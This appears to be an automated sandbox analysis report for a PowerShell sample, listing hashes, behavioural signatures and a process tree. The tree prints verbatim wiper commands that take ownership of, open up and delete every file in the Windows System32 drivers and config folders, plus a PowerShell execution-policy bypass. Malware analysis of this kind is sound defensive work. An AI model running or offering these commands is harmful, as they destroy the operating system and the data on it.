Analysis
-
max time kernel
35s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2024 20:55
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win7-20240705-en
General
-
Target
trigger.ps1
-
Size
1KB
-
MD5
84cb1e2083b8106b83a45c6aa00dd55d
-
SHA1
e12ea5b7deb81774acb89088dc1f2dce755782e9
-
SHA256
735116a2700250eb6865f98ebef5519c9de350fde9fc5bb0a3b3c18a63486c78
-
SHA512
4b01e6fcd0776596cf39de15cf7b8777f508246c6fb0f0023067db9116d364bd4693b71d9273c942c9357f18a2a631ec698b7e0a00d3f239da90df0b882e5e3a
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3280 takeown.exe 1156 icacls.exe 464 takeown.exe 2444 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3280 takeown.exe 1156 icacls.exe 464 takeown.exe 2444 icacls.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4836 powershell.exe 4836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 4836 powershell.exe Token: SeTakeOwnershipPrivilege 3280 takeown.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
powershell.execsc.execmd.execmd.exedescription pid process target process PID 4836 wrote to memory of 5036 4836 powershell.exe csc.exe PID 4836 wrote to memory of 5036 4836 powershell.exe csc.exe PID 5036 wrote to memory of 4912 5036 csc.exe cvtres.exe PID 5036 wrote to memory of 4912 5036 csc.exe cvtres.exe PID 4836 wrote to memory of 3496 4836 powershell.exe cmd.exe PID 4836 wrote to memory of 3496 4836 powershell.exe cmd.exe PID 3496 wrote to memory of 3280 3496 cmd.exe takeown.exe PID 3496 wrote to memory of 3280 3496 cmd.exe takeown.exe PID 3496 wrote to memory of 1156 3496 cmd.exe icacls.exe PID 3496 wrote to memory of 1156 3496 cmd.exe icacls.exe PID 4836 wrote to memory of 764 4836 powershell.exe cmd.exe PID 4836 wrote to memory of 764 4836 powershell.exe cmd.exe PID 764 wrote to memory of 464 764 cmd.exe takeown.exe PID 764 wrote to memory of 464 764 cmd.exe takeown.exe PID 764 wrote to memory of 2444 764 cmd.exe icacls.exe PID 764 wrote to memory of 2444 764 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gj21yse0\gj21yse0.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB853.tmp" "c:\Users\Admin\AppData\Local\Temp\gj21yse0\CSCE78DAEE45C64C88A02D24983DFF65.TMP"3⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2444
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5801f096aa731f0143562fe45221d1ce2
SHA1a7c5bfbfab02d179f035fa9fe0880bf3c05a7972
SHA2561f9c794c8da614cba9d38cd3496bc4f6ddf22d75bc724f8e589fe96feee4e3f1
SHA512b0db5b09456a3f46d54da1397087399e60818fe04648cc6f3e57815e9476d138d3595e554b70e20b8d79870c60acfe2423770fde5b4e1cbd9e879965437b68ab
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD57614d3cdbb521274796a372b1285d79e
SHA1c1dcb355c8a967fbff1e3bd1e7c3a9cdebe74215
SHA256ca03f03349e56cd4e43e9140e8f1798003cdaea4d0c216b664514d9369b57cdd
SHA5124a64461e115c636ed24104813f0f19acb28a5d77e04ef453e7bfb8231620c2ccd6962314aa2cd9d4341b4ef58b650fd88b1c7c5664601425d5eb7b12b809d3da
-
Filesize
652B
MD523d46548ea27a772f93cbea7cc2a5df4
SHA142b4fe29c76df577432c7e541a5bb2b93a3ce5a5
SHA256ada62ac865e2f9afe8d2619ae85fe3728930f2aa8e75f2aafe95dd3b6063a4e2
SHA5125c19ade94b0e64c36086423ba57140e077ee217a72700840924e2e36ffe666f987a7eadbef6d45ceb97bea746ad6e6d8db56effcf8d55bb6157fe42d7f1291e9
-
Filesize
819B
MD541f8d18f0172904a2236dd9396ead480
SHA135e7150c927b97b26d922f07a51e8fe833752933
SHA256d842c81d3641d456116098208a48542a96d5e4d256169069189e459cc265cef5
SHA51243dea5a479cf203bde58b412ac1ca7c064048e7d4544b2ef4354773a1805ccba2b85e6772466da0b9409fadaaa0f6f49654ed1e33a9ef75a4d43c3f058773da3
-
Filesize
369B
MD506152dd5fff67d3e5fc4cea2085eff4f
SHA139a45416c4398385637f05a79f9902b2bd2ad0ad
SHA25669abf9bd9fbbd31cf31ebb9d2cc4f635751430d5b3bd3ff77b9e2169193137dd
SHA5127f90526e8c77005a67626b6fa91028adfec02932b2647e0d58a9d192b7f6af17e7f975cd19c8acecc13a7df922df0640241d70aae7a484978b0c376b851dc96c